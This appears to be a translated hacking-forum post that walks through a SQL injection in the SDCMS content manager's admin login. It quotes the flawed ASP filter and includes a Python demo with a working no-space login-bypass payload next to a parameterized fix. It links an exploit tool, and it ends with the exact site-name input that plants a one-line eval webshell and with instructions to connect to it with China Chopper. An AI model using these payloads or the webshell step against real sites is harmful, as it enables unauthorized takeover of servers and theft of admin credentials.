Author: T00LS 鬼哥
Vulnerable file: <backend directory>/index.asp
Sub Check
    Dim username,password,code,getcode,Rs
    IF Check_post Then Echo "禁止从外部提交数据!":Exit Sub
    ' mode 1 of FilterText only strips whitespace (see the function below)
    username=FilterText(Trim(Request.Form("username")),1)
    password=FilterText(Trim(Request.Form("password")),1)
    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
    ' daily login-failure limit and captcha checks
    IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
    IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":died
    IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":died
    IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":died
    IF username="" or password="" Then
        Echo "用户名或密码不能为空":died
    Else
        ' username is concatenated straight into the SQL string; only password goes through md5() first
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
        IF Rs.Eof Then
            AddLog username,GetIp,"登录失败",1
            Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
        Else
            ' login state lives in cookies, including the stored password hash Rs(2)
            Add_Cookies "sdcms_id",Rs(0)
            Add_Cookies "sdcms_name",username
            Add_Cookies "sdcms_pwd",Rs(2)
            Add_Cookies "sdcms_admin",Rs(3)
            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
            AddLog username,GetIp,"登录成功",1
            ' automatically delete log records older than 30 days
            IF Sdcms_DataType Then
                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")   ' Access (Jet) syntax
            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")  ' MSSQL (T-SQL) syntax
            End IF
            Go("sdcms_index.asp")
        End IF
        Rs.Close
        Set Rs=Nothing
    End IF
End Sub
We can see that username is passed through FilterText with mode parameter 1. (password goes through the same filter, but it is md5-hashed before it reaches the query, so only username can alter the SQL.) Let's look at the code of FilterText:
Function FilterText(ByVal t0,ByVal t1)
    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    t0=Trim(t0)
    Select Case t1
        Case "1"
            ' mode 1: remove only space, CR and LF; quotes, operators and keywords pass through untouched
            t0=Replace(t0,Chr(32),"")
            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
            t0=Replace(t0,Chr(10),"")
        Case "2"
            ' mode 2: strip control characters and most ASCII punctuation
            t0=Replace(t0,Chr(8),"")    ' backspace
            t0=Replace(t0,Chr(9),"")    ' tab (horizontal)
            t0=Replace(t0,Chr(10),"")   ' line feed
            t0=Replace(t0,Chr(11),"")   ' vertical tab
            t0=Replace(t0,Chr(12),"")   ' form feed
            t0=Replace(t0,Chr(13),"")   ' carriage return (Chr(13)&Chr(10) is the CR/LF pair)
            t0=Replace(t0,Chr(22),"")
            t0=Replace(t0,Chr(32),"")   ' space
            t0=Replace(t0,Chr(33),"")   ' !
            t0=Replace(t0,Chr(34),"")   ' "
            t0=Replace(t0,Chr(35),"")   ' #
            t0=Replace(t0,Chr(36),"")   ' $
            t0=Replace(t0,Chr(37),"")   ' %
            t0=Replace(t0,Chr(38),"")   ' &
            t0=Replace(t0,Chr(39),"")   ' '
            t0=Replace(t0,Chr(40),"")   ' (
            t0=Replace(t0,Chr(41),"")   ' )
            t0=Replace(t0,Chr(42),"")   ' *
            t0=Replace(t0,Chr(43),"")   ' +
            t0=Replace(t0,Chr(44),"")   ' ,
            t0=Replace(t0,Chr(45),"")   ' -
            t0=Replace(t0,Chr(46),"")   ' .
            t0=Replace(t0,Chr(47),"")   ' /
            t0=Replace(t0,Chr(58),"")   ' :
            t0=Replace(t0,Chr(59),"")   ' ;
            t0=Replace(t0,Chr(60),"")   ' <
            t0=Replace(t0,Chr(61),"")   ' =
            t0=Replace(t0,Chr(62),"")   ' >
            t0=Replace(t0,Chr(63),"")   ' ?
            t0=Replace(t0,Chr(64),"")   ' @
            t0=Replace(t0,Chr(91),"")   ' [
            t0=Replace(t0,Chr(92),"")   ' \
            t0=Replace(t0,Chr(93),"")   ' ]
            t0=Replace(t0,Chr(94),"")   ' ^
            t0=Replace(t0,Chr(95),"")   ' _
            t0=Replace(t0,Chr(96),"")   ' `
            t0=Replace(t0,Chr(123),"")  ' {
            t0=Replace(t0,Chr(124),"")  ' |
            t0=Replace(t0,Chr(125),"")  ' }
            t0=Replace(t0,Chr(126),"")  ' ~
        Case Else
            ' default mode: HTML-entity encode instead of stripping
            t0=Replace(t0, "&", "&amp;")
            t0=Replace(t0, "'", "&#39;")
            t0=Replace(t0, """", "&quot;")
            t0=Replace(t0, "<", "&lt;")
            t0=Replace(t0, ">", "&gt;")
    End Select
    IF Instr(Lcase(t0),"expression")>0 Then
        ' break CSS expression() by inserting a soft hyphen after the first letter
        ' (compare=0 is a binary compare, so only lowercase "expression" is rewritten)
        t0=Replace(t0,"expression","e&#173;xpression", 1, -1, 0)
    End If
    FilterText=t0
End Function
See that? With parameter 1 it only filters:

    t0=Replace(t0,Chr(32),"")
    t0=Replace(t0,Chr(13),"")
    t0=Replace(t0,Chr(10)&Chr(10),"")
    t0=Replace(t0,Chr(10),"")

Space, CR and LF are removed; single quotes, =, or, parentheses and tab (Chr(9)) all pass through and are concatenated straight into the login query.
The vulnerability lets you obtain the backend account and password directly. The SDCMS default backend path is /admin/; if the site owner has changed the backend path, you will have to find it yourself!
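To make the point concrete, here is an added Python example; it is not code from the post, from the sdcms-EXP tool, or from SDCMS. It ports FilterText mode 1 and the login query from index.asp above, runs them against an in-memory SQLite table that stands in for the real Access/MSSQL Sd_Admin table (the admin row and its password are constructed for the example), and puts a parameterized login beside it. The bypass string is a generic no-space SQL injection payload chosen for the demonstration, not something taken from the post.

```python
import hashlib
import sqlite3


def filter_text_mode1(value: str) -> str:
    """Port of SDCMS FilterText(t0, 1): VBScript Trim (spaces only), then remove
    space, CR, LF+LF and LF. Nothing else is touched, so ' = ( ) and tab survive."""
    value = value.strip(" ")
    for needle in ("\x20", "\r", "\n\n", "\n"):
        value = value.replace(needle, "")
    return value


def build_login_query(username: str, password: str) -> str:
    """The string index.asp hands to Conn.Execute (column list shortened):
    username is concatenated raw, password only after md5()."""
    pwd_hash = hashlib.md5(password.encode()).hexdigest()
    return ("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin From Sd_Admin "
            "Where Sdcms_name='" + username + "' And Sdcms_Pwd='" + pwd_hash + "'")


def make_db() -> sqlite3.Connection:
    """Constructed fixture: one admin row in an in-memory SQLite table that
    stands in for the Access/MSSQL Sd_Admin table of a real install."""
    conn = sqlite3.connect(":memory:")
    conn.execute("Create Table Sd_Admin(Id Integer, Sdcms_Name Text, Sdcms_Pwd Text, isadmin Integer)")
    conn.execute("Insert Into Sd_Admin Values(1, 'admin', ?, 1)",
                 (hashlib.md5(b"correct-horse").hexdigest(),))
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    """What the Check sub does: filter, concatenate, execute. Returns the matched
    row (Id, name, stored hash, isadmin), or None where Rs.Eof would be true."""
    query = build_login_query(filter_text_mode1(username), password)
    return conn.execute(query).fetchone()


def safe_login(conn: sqlite3.Connection, username: str, password: str):
    """Hardened form (not SDCMS code): bound parameters, so the username can never
    change the shape of the statement, whatever characters it contains."""
    pwd_hash = hashlib.md5(password.encode()).hexdigest()
    return conn.execute(
        "Select Id,Sdcms_Name,Sdcms_Pwd,isadmin From Sd_Admin Where Sdcms_Name=? And Sdcms_Pwd=?",
        (username.strip(" "), pwd_hash)).fetchone()


# Example payload with no spaces, so mode-1 filtering leaves it intact. The query becomes
#   Where Sdcms_name='x'or'1'='1'or'1'='1' And Sdcms_Pwd='<md5 of a wrong password>'
# AND binds tighter than OR, so the middle '1'='1' term alone makes the WHERE clause true
# and the first admin row, stored password hash included, comes back.
BYPASS = "x'or'1'='1'or'1'='1"

if __name__ == "__main__":
    db = make_db()
    print(build_login_query(filter_text_mode1(BYPASS), "wrong"))
    print("vulnerable:", vulnerable_login(db, BYPASS, "wrong"))
    print("parameterized:", safe_login(db, BYPASS, "wrong"))
```

Because Chr(9) is not in the mode-1 list, a payload may also use tabs where it needs whitespace; only the space, CR and LF characters have to be avoided.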
Exploit tool download (this tool only runs on XP): sdcms-EXP
Test:

Now enter the captcha into the tool and click OK.

See, we've gone straight into the backend management interface, heh!

Straight into the backend just like that....
SDCMS privilege escalation (from backend login to a webshell):

Method 1: visit /<backend directory>/sdcms_set.asp and append ":eval(request(Chr(63)))' to the 网站名称 (site name) field. That writes a one-line webshell directly: the value is saved into /inc/Const.asp, where the leading " closes the string literal, the : starts a new VBScript statement, and the trailing ' comments out the rest of the line. The one-liner's connection password is ? (Chr(63)).

OK, now connect with 菜刀 (China Chopper)!